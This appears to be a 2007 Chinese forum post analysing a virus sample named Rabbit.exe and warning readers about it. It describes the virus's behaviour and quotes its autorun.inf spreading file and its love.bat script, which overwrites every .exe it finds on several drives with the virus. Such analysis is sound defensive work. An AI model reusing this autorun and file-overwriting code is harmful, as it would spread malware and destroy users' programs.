“小兔仔子”的变种

【注】：2007－04－10，又见到这个“小兔仔子”的变种（文件大小为192K，此变种还夹带wrttrs病毒）。

2007－04－08，在本论坛浏览帖子发现有网友提到一个名为“兔宝宝”（Rabbit.exe，文件大小：260K）的病毒。
依我看，Rabbit.exe叫“小兔仔子”可能更贴切

下载该样本，在“影子系统”下观察了一下其感染系统的情形（卡巴斯基和瑞星最新病毒库均查不到此毒）。现将所见过程罗列如下，希望大家警惕。

1、病毒运行后释放的病毒文件。此毒运行后关闭Tiny的Activity Monitor、SSM、IceSword等窗口。

2、msexch400.dll是此毒的一个重要角色（插入winlogon.exe进程且不能强制卸除）。

3、病毒在硬盘各分区根目录和U盘根目录下创建autorun.inf和Rabbit.exe。autorun.inf文件内容如下：
autorun.inf
[autorun]
Label=本地磁盘

Shellexecute=Rabbit.exe

love.bat的内容如下：

FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"

4、注册表改动：
（1）在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\分支添加启动项：
{4bf41072-b2b1-21c1-b5c1-0305f4155515}
指向C:\WINDOWS\system32\JK.exe
（2）删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

5、系统文件以外（包括非系统分区）的.exe文件均被替换为260K大小的病毒文件（文件名还是原来正常.exe的文件名），图标变为“兔宝宝”。即使是“卡巴斯基”或“瑞星”文件夹中的.exe也不例外。

6、Tiny用户，即使预先设置了相关文件保护规则，病毒依然可以突破Tiny的FD规则，将那些受Tiny保护的.exe文件替换成260K的病毒文件。这是我第一次遇到可以突破Tiny 文件保护的病毒。

7、还观察到此毒的另一个有趣行为：在系统分区以外的分区中，只要发现一个DLL文件（如：abc.dll），病毒即刻创建一个同名的、260K的.exe（abc.exe），图标也是“兔宝宝”。

8、中招后，用户就别指望扫什么劳什子日志求助了。运行任何.exe（当然包括SRENG等），你只能见到一闪而过的命令提示符窗口（实际运行的是那个260K的病毒体）。

9、此毒可能认为自己很NB，并未没采用多数病毒的常用策略————禁用taskmgr和regedit。

10、此毒不能突破“影子系统”。安装SSM和Tiny的用户，Rabbit.exe运行时，用户可看到相应提示对话框。如果用户足够警惕且予以正确回应，SSM和Tiny可阻止此毒运行。